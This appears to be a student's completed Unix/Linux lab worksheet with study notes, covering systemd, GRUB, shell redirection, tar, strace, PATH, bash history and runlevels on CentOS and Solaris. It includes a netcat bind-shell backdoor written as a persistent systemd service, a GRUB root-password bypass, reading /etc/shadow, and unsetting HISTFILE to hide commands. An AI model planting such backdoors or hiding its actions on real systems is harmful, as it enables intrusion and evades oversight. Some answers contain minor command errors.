Run the following command on the CentOS machine directly (not in the SSH connection):
# systemctl disable sshd
Did the SSH session terminate?
No, the session is still active. Disabling a service does not kill any active connections.

Log into the Solaris machine again and attempt another SSH session to the CentOS machine.
Explain the results of the attempt.
Connection succeeded since the SSHD process is still running. Stopping the SSH service will not kill the active daemon, but upon reboot it will
no longer be running.

Reboot the CentOS machine using the init command in the SSH session.
What syntax/command was used?
init 6
Log into the CentOS machine and run the following command:
# systemctl status sshd
Explain what the loaded and active output lines indicate.
The loaded field indicates that the module was found and loaded, but it is disabled on boot.
The active field indicates that the process is not currently running.
Enable the SSH service to start on boot.
What syntax/command was used?
systemctl enable sshd
Explain what the loaded and active output lines indicate using the following command:
# systemctl status sshd
The loaded field indicates that the module was found and loaded, and it is enabled on boot.
The active field indicates that the process is not currently running.
Document the steps an administrator would take to change root's password on a CentOS machine by modify the GRUB boot record.
Warning: Only perform these actions on a local/physical machine.
Boot into single-user mode, which does not require a password, then reset the root password with the passwd command
Change the ro option to rw init=/bin/bash
Mount the root filesystem using the command chroot /sysroot/
Use the passwd command to change the root password
Use the reboot -f command to restart the machine
Use the following commands to create a persistent backdoor using netcat on the CentOS machine.
# cd /etc/systemd/system/
# vi backdoor.service
The contents of the backdoor.service file:
[Unit]
Description=Netcat backdoor daemon
Documentation=man:nc(1)
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/nc -lp 445 -e /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target
Reload the daemons and enable the backdoor:
# systemctl daemon-reload
# systemctl start backdoor
# systemctl status backdoor
Allow incoming connections on port 445 through the firewall:
# firewall-cmd --add-port 445/tcp
Connect to the backdoor using the Solaris machine.
What syntax/command was used?
nc 10.10.1.40 445
Establish backdoor persistence on the CentOS machine after a restart.
What syntax/command was used?
Enable the service by using the following command:
systemctl enable backdoor
Restart the CentOS machine and try to connect to the backdoor from the Solaris Machine.
Was the connection successful?
Why or why not?
The firewall entry to allow port 445 was removed after the CentOS machine restarted. The
--permanent flag needs to be added to the firewall-cmdcommand to allow the port to remain open after reboot.
Disable the backdoor, stop the backdoor service, and remove any files associated with backdoor.service. Record the syntax/commands used.

systemctl disable backdoor

systemctl stop backdoor
rm /etc/systemd/system/backdoor.service
This section deals with modifying grub boot options and adding a custom entry into the boot menu.
NOTE: THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY. DO NOT RUN THESE ON YOUR VIRTUAL MACHINE.
# vim /etc/grub.d/40_custom
The contents of the 40_custom file:
menuentry "CentOS Linux 7 Multi-User Mode" {
set root=(hd0,1)
linux /vmlinuz-3.10.0-693.5.2.el7.x86_64 root=/dev/mapper/cl-root ro systemd.unit=graphical.target text
initrd /initramfs-3.10.0-693.5.2.el7.x86_64.img
boot
}
This command will rebuild the configuration files used by grub:
# grub2-mkconfig --output=/boot/grub2/grub.cfg
In the 40_custom file, which systemd.unit target would need to be used to allow the user to boot into the multi-user target instead of the
graphical target?

multi-user.target

Which variable in the /etc/default/grub file would need to be edited in order to change the timeout from five seconds to fifteen seconds?

GRUB_TIMEOUT

Run the command below and answer the following:

# echo The rain in Spain is mostly on the plain.

 Where is echo taking its input from?

 Where is echo sending its output?
 Is echo using STDIN?
 The echo command takes its input from command-line arguments.
It ignores input from STDIN and simply prints what it is given on the command line to STDOUT.
Run the command below and answer the following:

# cat

 What happens after typing "hello world" and pressing Enter?

 What happens after typing "goodbye world" and pressing Enter?
 How does the cat command process input?

Press CTRL+d to finish.

Note: The cat command takes input from STDIN and writes it to STDOUT. Notice how the terminal waits for input.
The text is repeated back every time Enter is pressed. The cat command will take what it receives from STDIN and display it to the
user.

Run the commands below and answer the following:

# cat /etc/shadow /etc/ssh/ssh_config

# cat < /etc/shadow
# echo "Hello World" > ex1

 Which syntax/command will show the contents of the file ex1?

 What is the difference between cat /etc/shadow and cat < /etc/shadow?

Note: The cat command treats command line arguments as filenames and will open the files in order and write their contents to
STDOUT. A redirection operator (>) can be used to send the output to a file instead of STDOUT.
Run the following command to show the contents of the ex1 file:

# cat /tmp/ex1
cat /etc/shadow uses command line arguments to display the information, while cat < /etc/shadow will read a file from STDIN and
display the information.
Run the commands below and explain what happened to the output streams:
# cat "Hello World" > ex1
# cat ex1

# cat "Hello World" > ex1

cat: Hello World: No such file or directory
Error messages generated by the cat command are displayed by using the stream STDERR. Nothing will be in the file ex1, because no
output is produced using the STDOUT stream.
# cat > ex1
Hello World<ENTER>
<CTRL> + <D>
# cat ex1

The cat command runs and waits for the user to type something. Any content it receives is now appended to the ex1 file.

# cat ex1
Hello World
Run the following commands and record the results:
# echo "Hello World" | cat> ex1
# cat < ex1
# cat < ex1 > ex1
# echo < ex1 > ex1
# echo ex1 >> ex1
# cat < ex1 > box
# cat < ex1 | cat >> ex1
# cat < ex1 >> ex1
<CTRL> + <C>
# echo Clean the floor & cat box
# echo "Clean the floor & cat box"

Run this same sequence of commands on the Solaris machine and note any differences.
Uses cmd line arguments as input through echo and redirects STDOUT (via pipe) to the STDIN of cat, which will then redirect STDOUT to
the ex1 file. This places the text "Hello World" into the ex1 file.

# echo "Hello World" | cat > ex1

The contents of the ex1 file are passed to STDIN of cat and displayed to the screen.

# cat < ex1

The STDOUT is redirected into the ex1 file while the contents of the ex1 file are passed to STDIN of cat. Because of the ordering, the file
will now contain no data.

# cat< ex1 > ex1

Note: Solaris displays the following error:
# cat <ex1 > ex1
cat: input/output files '-' identical.
The content of the ex1 file (which is now empty) is passed to STDIN of echo, which in turn redirects the default output of echo (a single
newline) into the ex1file.

# echo < ex1 > ex1

Appends the STDOUT of echo to the ex1 file. The file now contains a newline and the text ex1.

# echo ex1 >> ex1

The contents of the ex1 file are passed to STDIN of cat and then redirected to create a new file named box with the same contents as
the ex1 file.

# cat < ex1 > box

The contents of the ex1 file are passed to STDIN of cat and then the STDOUT is piped to the STDIN of another cat process, which
appends the contents to the end of the ex1 file.

# cat < ex1 | cat >> ex1

The contents of the ex1 file are passed to STDIN of cat while cat is appending the contents into the ex1 file. This will cause the file to
expand rapidly, doubling its content every time.

# cat < ex1 >> ex1

The echo command will echo the arguments "Clean the floor" and run the process in the background. The cat command then displays
the contents of the box file.

# echo Clean the floor & cat box

The echo command will echo the string "Clean the floor & cat box" to STDOUT.

# echo "Clean the floor & cat box"

Describe what the tee command does and explain the following:

# ls -lisa | tee filelisting | less

The tee command reads from standard input and writes to standard output and files simultaneously.
The following command will generate a file listing and pipes STDOUT to the STDIN of the tee command, which creates a file
named filelisting and pipes STDOUT to STDIN of less:

# ls -lisa | tee filelisting | less

The follwing command will run the ls command and redirect the output to both a text file named filelisting and pipe the output to
the less command.
# ls -lisa | tee filelisting | less
Document and execute the command that will write the ls command output to a file named filelisting then display the file contents with
the less command in one line.
Note: Both the & and ; cause most shells to treat what precedes the symbol as one command and what follows it as another
The following commands have the same behavior:

# ls -lisa > filelisting; less filelisting

# ls -lisa > filelisting& less filelisting
Create the following directory, change into it and record the syntax/command used:
/tmp/backup

Note: Tar is short for tape archive and was originally used to create backup tapes. However, it has been re-purposed as a method of
packaging a directory structure into a single file, typically called a tarball. Consult the man page for more information.
# mkdir /tmp/backup
# cd /tmp/backup

Use the tar command to create a backup of the /var/run directory named run.tar in the /tmp/backupdirectory, then extract
the run.tar backup into the /tmp/backup directory.
Answer the following:

 What syntax/command was used to create the backup?

 What syntax/command was used to extract the backup?
 What file/directory names are created in the /tmp/backup directory?

Run the following command to clean up the directory:

# rm -rf /tmp/backup/*
Note: The /var/run directory contains symbolic links. By default the tar command will not follow symlinks and add them to the archive.

# cd /tmp/backup
# tar -hcf run.tar /var/run
# tar -xvf run.tar
# ls -l
total 8600
-rw-r--r--. 1 root root 8806400 Nov 3 16:07 run.tar
drwxr-xr-x. 3 root root 17 Nov 3 16:07 var
Write a chain of commands with the ; operator to complete the following and record the syntax/command used:
 Change directory to /var/run
 Tar the contents of the /var/run directory into /tmp/backup/run.tar
 Change directory back to /tmp/backup
 Document the final command below

# cd /var/run; tar -hcvf /tmp/backup/run.tar ./; cd /tmp/backup/

Write a single command using the tar -C option that mimics the behavior of the following:

# cd /var/run; tar -hcvf /tmp/backup/run.tar ./; cd /tmp/backup/

# tar -C var/run -hcvf /tmp/backup/run.tar /var/run

Run the following on the Solaris machine and record the results:

# tar -C /var/run -hcvf /tmp/backup/run2.tar /var/run

# tar -C /var/run -hcvf /tmp/run.tar /var/run

tar: C: unknown function modifier
Using | (pipe), write a command that prints only the 12th line of the tar listing by printing the last of the first 12 lines.
Note: The tar -t option will produce a listing of the files in run.tar file. There are multiple ways to extract a specific entry. Use only the
head and tail commands.

# tar -tf run.tar | head -12 | tail -1

var/run/NetworkManager/resolv.conf
Write a single command that identifies the 12th entry from the run.tar file using command substitution.

tar -xf /tmp/backup/run.tar `tar -tf /tmp/backup/run.tar | head -12 | tail-1`

Write a single command that extracts the 12th entry from the run.tar file using command substitution on the Solaris machine and
record any differences.

tar -xf /tmp/backup/run.tar `tar -tf /tmp/backup/run.tar | head -12 | tail-1`

No differences.
The command ps -ef provides a thorough view of the processes on the system, though there is significant variation in the options
for ps across Unix flavors.
Note: Use the command-line help and man pages for more information. Search the manual pages by using the syntax: man -
k {searchstring}.
Example:
# man -k PATH, man -k filetype
Answer the following regarding ps and the environment for both the Solaris and CentOS machines:

 What is the location of the ps command?

 What type of file is the ps command?

CentOS

# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for
GNU/Linux 2.6.32, BuildID[sha1]=3ca95c5bfec071ba29e28124db03a693d9423904, stripped
Solaris

# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 32-bit LSB Executable 80386 Version 1, dynamically linked, stripped
On the CentOS machine, run the following stracecommands and describe the differences:

# strace ps 1> a.txt

# strace ps 2> b.txt
The contents of the a.txt file contain the output of the ps command.
The contents of the b.txt file contain the output of the strace command.
Note: The strace command provides a detailed list of all system calls that a command makes; it is invoked by passing the command
string as an argument to the strace command. strace outputs to STDERR stream.
On the CentOS machine, run the following strace command and record the results:

# strace ps | less
Did the command work? Why or why not?
The strace command is producing output via the STDERR stream.
The pipe operator is expecting the data it is sending to the less command to come from the STDOUT stream.
Document the appropriate strace syntax to complete the following:
 Redirect the strace command output to a file named pstrace1.txt using shell redirection operators.
 Redirect the strace command output to a file named pstrace2.txt without using shell redirection operators.

With shell redirection:

# strace ps 2> pstrace_1.txt

Without shell redirection:

# strace -o pstrace_2.txt ps
Where in the file system is the strace command locating information for the ps command?
Note: The PID of the processes may be useful in referencing information within the pstrace1.txt file.

/proc/<PID>

# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Answer the following questions regarding the pstrace1.txt file.

 What command will find all references to the user's BASH shell?
 How many lines refer to this PID?
 What system call is used to print output to the screen?
 Find all references to the user's BASH shell PID :
 # strace ps -o pstrace1.txt
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Number of PID references:

# cat pstrace1.txt | grep 13039 | wc -l

9
System call to output the PID info to the screen:

# strace ps -o pstrace1.txt
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Based on the output of the following command, does the ps command use the fork or exec system call?

# cat pstrace1.txt | awk -F: '{print $1}' | sort | uniq

Note: This chain of commands shows a sorted, unique list of the system calls used by the ps command.
No, the ps command uses the exec system call.

# cat pstrace1.txt | awk -F '(' '{ print $1 }' | sort | uniq | grep exec
execve
# cat pstrace1.txt | grep fork
# cat pstrace1.txt | grep exec
execve("/usr/bin/ps", ["ps"], [/* 42 vars */]) = 0

Run the following command to compare the root.console and root.ssh text files:

sdiff root.ssh root.console

Search the output for the process ID and document the command/syntax used.

sdiff root.ssh root.console | grep PID

Based on the output of the previous question, what is the PPID environment variable?

The parent process ID environment variable is $PPID

Examine the process information for the current shell using the following command:

# ps -ef | grep $$
What does the $$ variable represent?
$$ indicates the current PID.

What information is reported by the consoletype command?

The type of console currently in use.

Which commands can be used to compare text files in Unix? List all that apply and record the syntax/command used.

man -k compare will yield the commands.

cmp and diff
Log into the CentOS machine via SSH as intern01, and dump a copy of the environment to /tmp/intern01.sh
Use the su command to switch to root and dump a copy of the environment to /tmp/root.sh
Stay logged in as root.
What is the current shell?

# echo $0
bash
# ps -ef | grep $$
root 13039 13031 0 07:19 pts/0 00:00:00 bash
root 49553 13039 0 12:07 pts/0 00:00:00 ps -ef
What is the current directory?

# pwd
/home/intern01
What is the home directory of both root and intern01 specified in their environment?

The variable for root is HOME=/root

The variable for intern01 is HOME=/home/intern01
Which directory does the following command change to?
# cd ~
# pwd
/root
Run the following and record whether it was successful:

# ifconfig -a
The command returns the interface configuration.

Identify the full path of the ifconfig command being run.

# which ifconfig
/usr/sbin/ifconfig
Which directory contains the ifconfig executable?

# which ifconfig
/usr/sbin/ifconfig
Change the entries in PATH by entering the following text into the shell window.
# PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/home/intern01/.local/bin:/home/intern01/bin

Run the following and record the results:

# ifconfig -a

Run the ifconfig -a command in the root shell window using the full file path and record the syntax used.

/usr/sbin/ifconfig -a

Explain why the PATH variable is important.

Run the following commands to add the /usr/sbindirectory back into the PATH variable and examine the contents of the variable:

# echo $PATH
# export PATH=${PATH}:/usr/sbin
# echo $PATH
# ifconfig -a
The path variable indicates where to look for binaries when running a program from the command line. If a path is not present inside of
the PATH variable, the complete path name must be used to run the program.
Exercise Takeaway
Always use full command paths. It can be difficult to predict what the PATH will look like in various environments, so users may be
unable to run commands not in the PATH. Users may run a malicious version of a command from a directory that appears earlier in the
PATH variable.
The su command lets users run commands as the root role, but it does not change to the root user when invoked in this way.
The /proc directory contains a folders named after currently running processes. Record the command used to view the environ file of
the current shell's parent process.

# cat /proc/$PPID/environ
Pipe the output of the previous command to the following tr command to clean up the output and determine the value of the SHELL
environment variable:

tr '\0' '\n'
Note: The environ file uses the null character (\0, ASCII 0) instead of the newline character (\n, or ASCII 10) to separate records. This
command will replace the null character with a newline to make the output legible.

cat /proc/$PPID/environ | tr '\0' '\n'

This command will produce a cleaner output.

cat /proc/$PPID/environ | tr '\0' '\n' | grep SHELL

SHELL=/bin/bash
On the Solaris machine, use the pargs command to view the system environment information.

# pargs -e $PPID
Complete the following steps and explain the differences in the ps command output:

 In another terminal, SSH into the CentOS machine

 Log in as the intern01 user
 Change to the root user
 Run the following in both terminals:

# ps-ef grep $$

Both SSH shells are spawned by different parent processes.

Run the following in the new terminal without giving the full path and record the results:

# ifconfig -a
The command executes because the environment variables of the new shell have not been modified.

Log into the Solaris machine as root and enter the following. Record any differences between ls and ls -a:

# cd ~
# ls
# ls -a
The -a option of the ls command displays hidden files. Hidden files are notated by a period at the beginning of the file name.

Look at the last line of the .bash_history file using the tail command and answer the following:

 What syntax/command was used?

 Is the last command reported also the last command run?
 tail -1 ~/.bash_history
The last command reported in the .bash_history file was the last command of the previous shell session.
Complete the following on the Solaris machine:

 Without closing the console window, logout and logon.

 Look at the last 10 commands in the . bash_historyfile using tail.

Answer the following:

 Are the commands from the previous login session shown?

 Press the up arrow. Which command appears?
 Commands from previous session are still there.
 The command history is imported, and pressing up will show the previously run command.
SSH into the CentOS machine as the intern01 user and run the following:

$ su root
# who am i
# exit
$ exit

 Which commands were written to root's command history?

 Which commands were written to intern01'scommand history?
  The su command will be written to intern01’s command history only.
 intern01's history:
 su root
exit
 root's history:
 who am i
exit
 SSH into the CentOS machine as the intern01 user and run the following:
 $ su root
# cat /var/log/secure
# exit
$ exit
 Was the cat command written to root's .bash_historyfile?
The commands should be in root’s history.

SSH into the CentOS machine as the intern01 user and run the following:

$ su root
# cd /var
# cd log
# head messages
# unset HISTFILE
# exit
$ exit
Are any of the commands written to root's history?
The commands should not be written to root’s history.

Use the shell script below to answer the following:

Contents of web.sh:
#!/bin/bash
base="/var/www"
default_port=8080
function serve {
read request
while /bin/true; do
 read header
[ "$header" == $'\r' ] &&break;
done
url="${request#GET }"
url="${url% HTTP/*}"
filename="$base$url"
if [ -f "$filename" ]; then
echo -e "HTTP/1.1 200 OK\r"
echo -e "Content-Type: text/html\r"
echo -e "Content-Length: `ls -l $filename | awk '{ print $5 }'`\r"
echo -e "\r"
cat "$filename"
echo -e "\r"
else
echo -e "HTTP/1.1 404 Not Found\r"
echo -e "Content-Type: text/html\r"
echo -e "\r"
echo -e "404 Not Found\r"
echo -e "Not Found <br/> The requested resource was not found\r"
echo -e "\r"
fi
echo -e "\004"
exit
}
rm -f www_fifo
mkfifo www_fifo
port="$default_port"
[ $# -gt 1 ] &&port="$2"
echo "Starting WWW on port $port..."
while true; do
(cat www_fifo) | nc -l $port | ( serve > www_fifo )
done

Save the following as temp.html in the /var/www directory:

<html>
<body>
 Hello!
</body>
</html>
# ps -lA | grep web.sh
0 S 0 67339 67213 0 80 0 - 28283 do_wai pts/1 00:00:00 web.sh
1 S 0 67516 67339 0 80 0 - 28283 pipe_w pts/1 00:00:00 web.sh
All processes with a parent of the script:
# ps -lfA | grep 67339
0 S root 67339 67213 0 80 0 - 28283 do_wai 14:27 pts/1 00:00:00 /bin/bash ./web.sh
0 S root 67514 67339 0 80 0 - 26981 pipe_w 14:27 pts/1 00:00:00 cat www_fifo
0 S root 67515 67339 0 80 0 - 11004 poll_s 14:27 pts/1 00:00:00 nc -l 8080
1 S root 67516 67339 0 80 0 - 28283 pipe_w 14:27 pts/1 00:00:00 /bin/bash ./web.sh
Explain what the web.sh script is doing.

The web.sh script is a simple, BASH based webserver.

Run the web.sh script to find the temp.html file using the machine's web browser and record which URL was used.

localhost:8080/temp.html
Or

127.0.0.1:8080/temp.html
Or

<CentOS IP>:8080/temp.html
Which line of the script provides the branch that ensures a file exists in the /var/www directory?

13 if [ -f "$filename" ]; then
Close the web server and open it with a new invocation that will cause the script to listen on port 8082.

 What syntax/command was used?

 What is the function of the first command-line argument?
 # ./web.sh blah 8082
 The first argument ($1) is not used at all in the script. The second argument ($2) indicates the non-default port to use.
Review the following:

echo -e "Content-Length: `ls -l $filename | awk '{ print $5 }'`\r"

 Does this line use the fifth command-line argument to the script?
 Why or why not?

This line does not indicate a script argument. It indicates an argument to the awk command.
The fifth column of the long listing of a file indicates its file size.

# ls -l /var/www/temp
-rw-r--r--. 1 root root 37 Nov 6 14:42 /var/www/temp
The output of the ls -l command is piped to the awk command, which uses $5 to indicate the fifth column of the data it received
should be displayed.

# ls -l /var/www/temp | awk '{ print $5 }'

37
A runlevel is an indicator that the init command uses to determine which lines of the /etc/inittab file are relevant for the desired
running configuration.
Match the runlevel with the appropriate use (assuming a Linux SystemV OS).
Multi-user mode with networking enabled → 3
Extra, typically unused by the system → 4
Shutdown → 0
Multi-user mode with networking and GUI enabled → 5
Singer-user mode → 1
Reboot → 6
Multi-user mode with no networking enabled → 2

What command should be run to view the current runlevel when working with systemd?

runlevel
who -r
Either is correct.
What file does the init command rely on to determine what to do when booting or changing the runlevel?

/etc/inittab or inittab
What command ensures that the httpd service does not start on boot when working with systemd?
Note: You may want to run the command on your CentOS machine to verify that it works.
systemctl disable httpd
Log in at the console. Assume that no other users are logged in to the system and that no commands have run.
Which process would you expect to see running on a SystemV system but NOT on a Solaris system?

According to the diagram, SystemV would have initand login and shell running if someone logged in using the console, but Solaris
would have init and shell running (no login process). SystemV has initrunning, init makes a copy of itself forks() which then
changes exec() to getty. getty then changes (exec) to login. Once someone logs into the machine, login makes a copy of itself (forks)
which changes exec() to shell.

Type the ls command (use shell expansion) to list all filenames that begin with the letter "a".
Note: Shell expansion is similar to REGEX in syntax
ls a*

Assume these commands are run in a BASH Shell on a CentOS machine. Use shell expansion to match all filenames that begin with the
letter "e" or the letter "d".

ls [de]*

Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that contain the sequence "ea."

ls *ea*

Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that do not end with the letter "r."
ls *[!r]

Which system calls are used to run a program?

Fork (), exec ()

Which command will cause the contents of file1 to be appended to file2?

The correct answer is: cat < file1 >> file2

Which signals cannot be handled by a program?

The correct answers are: SIGKILL, SIGSTOP

When a user presses Ctrl+Z to stop a process, that process will still exist in the process list.

True

Use the following output to identify the fourth script/executable referenced in the inittab that will run upon booting into the default
runlevel.
# cat /etc/inittab
id:3:initdefault:

# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
x0:0:wait:/etc/rc.d/rc 0
x1:1:wait:/etc/rc.d/rc 1
x2:2:wait:/etc/rc.d/rc 2
x3:3:wait:/etc/rc.d/rc 3
x4:4:wait:/etc/rc.d/rc 4
x5:5:wait:/etc/rc.d/rc 5
x6:6:wait:/etc/rc.d/rc 6

# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powered installed and your
# UPS connected and working correctly.
 pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it. pr:12345:powerokwait:/sbin/shutdown -c "Power
Restored; Shutdown Cancelled"
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty ttys
6:2345:respawn:/sbin/mingetty tty6
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
2:2345:respawn:/sbin/mingetty tty2

Explanation
# Any lines that begin with (#) are considered comments and are not executed
id:3:initdefault: (Sets the default run level for the box, not a script)
si::sysinit:/etc/rc.d/rc.sysinit (Always executed, script 1)
x3:3:wait:/etc/rc.d/rc 3, (Executed as it is the default run level, scrip 2)
The following are conditional, so they won’t execute automatically.
ca::ctrlaltdel:/sbin/shutdown -t3 -r now (Not an external script)
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
1:2345:respawn:/sbin/mingetty tty1 (Script 3)
2:2345:respawn:/sbin/mingetty tty2 (Script 4)

The correct answer is: 2:2345:respawn:/sbin/mingetty tty2

The following are conditional, so they won’t execute automatically.

Use shell expansion to list all files in a directory whose names start with the letter "r" and have three characters. Your selection must be
three characters (including the letter "r").

Answer: ls r??
Shell expansion and Patterns
? Matches exactly one character
?? Matches exactly two characters
Type the name of the BASH Shell command history logfile on a CentOS machine.

The following command typed inside of a BASH Shell will display the location of the logfile:
# echo $HISTFILE
System V: A Major common ancestor of many Unix systems released by AT&T in 1983. PAGE 5

Systemd: The replacement for sysV. Page 5

Solaris page 6

Processes first discussed on page 8. Exec() and fork() on page 8

Change permissions absolute and relative page 16

Special bits SUID, SGID, sticky page 17

Timestamps mtime, atime, ctime page 18

Timedatectl page 19

Stat command p21 stat /usr/llocal/config

Truss – f -v “last, lsat64” ls -d /etc/passwd/ 2>&1 | grep “[amc]t = “ used before solaris 10 page 21

Hard links page 22 soft links page 23

Which Command page 24 locate page 25 find page 26 mount page 27 recover a file page 27 df -h page 28

Kernel threads page 36, parent child relationships page 37, zombie process page 38 Solaris process list page 39

Process list fields page 40, Linux process list page 41, lsof page 43, /proc page 44

Init page 54, runlevels page 54, system 5 page 54, /etc/initab page 55, /etc/rc.d/rc page 58, startup scripts
rc.sysinit and /etc/inittab page 59, chkconfig page 59, service mysvc start page 60, System V management commands
page 60, SysV drawbacks page 61, run level comparison page 62, Service Management Facility (SMF) page 62, svcs:
like chkconfig manages which services tart at boot page 62, systemd page 63, system service management commands
page 64, systemctl page 64, init process runs after system startup page 68, getty page 68, shell initialization
page 69, Secure shell initialization page 69, Common shells page 70, shell features page 71, stdin, stout, stderr
page 72, job control page 72, bg fg command page 73, sigkill, sighup, sigstop, sigterm, sigtstp, sigint page 74,
redirection page 74, expansion and patterns bash shell page 75, Command substitution page 77, Shell modes login vs
non-login page 78, histfile and histsize page 83, Scripting fundamentals page 85,